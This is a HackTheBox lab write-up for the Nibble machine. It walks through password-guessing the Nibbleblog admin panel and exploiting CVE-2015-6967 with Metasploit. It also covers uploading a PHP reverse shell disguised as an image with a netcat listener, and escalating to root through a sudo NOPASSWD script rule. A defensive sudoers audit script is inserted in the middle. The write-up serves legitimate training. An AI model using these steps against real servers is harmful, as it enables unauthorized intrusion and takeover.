HackTheBox Write-up Nibble



This is a write-up of the machine NIBBLE from HackTheBox.

DIGEST

Nibble is an easy machine based on a Nibbleblog vulnerability. Using Metasploit we gain the initial shell, and after exploiting SUID we gain root on the machine.

Machine Author: mrb3n
Machine Type: Linux
Machine Level: 3.7/10

machine map

Know-How

  • Nmap
  • Searchsploit
  • Metasploit

Absorb Skills

  • CVE-2015-6967

Scanning the Network

$ nmap -sC -sV 10.10.10.75
man nmap
nmap result

The page source on port 80 gives us a hint about the /nibbleblog directory.

view-source://10.10.10.75/
//10.10.10.75/nibbleblog/

Running Dirbuster on Port 80

Dirbuster

admin.php looks interesting; let's try to brute-force it with some commonly used passwords.

admin page

Username: admin

Password: nibbles

Setting page

Nibbleblog is on version 4.0.3; let's find out whether there is any known vulnerability available.

Exploiting the Server

searchsploit nibbleblog 4.0.3
searchsploit result

Let's use Metasploit to exploit the vulnerability.

msf5 > use exploit/multi/http/nibbleblog_file_upload  
msf5 exploit(multi/http/nibbleblog_file_upload) > set targeturi nibbleblog
targeturi => nibbleblog
msf5 exploit(multi/http/nibbleblog_file_upload) > set RHOSTS 10.10.10.75
RHOSTS => 10.10.10.75
msf5 exploit(multi/http/nibbleblog_file_upload) > set USERNAME admin
USERNAME => admin
msf5 exploit(multi/http/nibbleblog_file_upload) > set PASSWORD nibbles
PASSWORD => nibbles
msf5 exploit(multi/http/nibbleblog_file_upload) > exploit
preparing exploit
exploiting the server

PRIVILEGE ESCALATION

Basic Linux Privilege Escalation

$ find / -perm -u=s -type f 2>/dev/null
$ sudo -l
man sudo
finding the NOPASSWD file

We can run monitor.sh without using the password.

/home/nibbler/personal/stuff/monitor.sh

OWN ROOT

This file does not exist, however, so it is possible to create a simple bash script in its place to achieve root access.

creating the bash script
own root
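
Seen from the defender's side, the weakness above is a sudoers NOPASSWD rule whose target lies under a directory that a non-root user controls. The audit below is an added example, not part of the original write-up: its sudoers parsing is simplified, and the sample sudoers lines, uid 1001 and the filesystem model are constructed for illustration.

```python
import os
import re
from types import SimpleNamespace

# Constructed sudoers lines: the first mirrors the NOPASSWD entry found with
# `sudo -l` above; the second is a root-owned binary added for contrast.
SAMPLE_SUDOERS = """\
nibbler ALL=(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
nibbler ALL=(root) NOPASSWD: /usr/bin/uptime
"""
# Constructed filesystem {path: (owner uid, mode)}; uid 1001 is assumed to be nibbler.
SAMPLE_FS = {"/": (0, 0o755), "/home": (0, 0o755), "/home/nibbler": (1001, 0o755),
             "/usr": (0, 0o755), "/usr/bin": (0, 0o755), "/usr/bin/uptime": (0, 0o755)}

def sample_stat(path):
    """Stand-in for os.stat over SAMPLE_FS; raises like os.stat when absent."""
    if path not in SAMPLE_FS:
        raise FileNotFoundError(path)
    return SimpleNamespace(st_uid=SAMPLE_FS[path][0], st_mode=SAMPLE_FS[path][1])

def nopasswd_paths(sudoers_text):
    """Yield (user, absolute command path) for each NOPASSWD command."""
    rule = re.compile(r"(?!#)(\S+)\s+\S+\s*=\s*(?:\([^)]*\)\s*)?NOPASSWD:\s*(.+)")
    for line in sudoers_text.splitlines():
        m = rule.match(line.strip())
        for cmd in (m.group(2).split(",") if m else []):
            path = (cmd.split() or [""])[0]
            if path.startswith("/"):          # skips ALL, aliases and other tags
                yield m.group(1), path

def audit(sudoers_text, stat_fn=os.stat, trusted_uids=(0,)):
    """Flag NOPASSWD targets that a non-root user can create or replace."""
    findings = []
    for user, path in nopasswd_paths(sudoers_text):
        node, state = path, "exists"
        while True:                           # check the target, then each parent
            try:
                st = stat_fn(node)
            except OSError:
                st, state = None, "missing"   # keep climbing to an existing parent
            if st and (st.st_uid not in trusted_uids or st.st_mode & 0o022):
                findings.append((user, path, state, node))
                break
            if node == "/":
                break
            node = os.path.dirname(node)
    return findings

if __name__ == "__main__":
    print(audit(SAMPLE_SUDOERS, sample_stat))
```

Each finding names the rule's user, the target path, whether the target exists, and the first path component that is not root-controlled. Called without `stat_fn`, `audit` checks the real filesystem.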

Manual exploitation

NibbleBlog 4.0.3: Code Execution

STEP 1: Find the PHP reverse shell.

I am using a Pentestmonkey reverse shell.

pentestmonkey/php-reverse-shell

STEP 2: Upload the PHP shell as an image.

PHP-reverse-shell.php
//10.10.10.75/nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image

STEP 3: Setting up the reverse shell.

$ nc -lnvp 4444
man nc

STEP 4: Visit the image URL; it will give back the reverse shell.

//10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php

reverse shell

inc0gnito – Medium


HackTheBox Write-up Nibble was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.



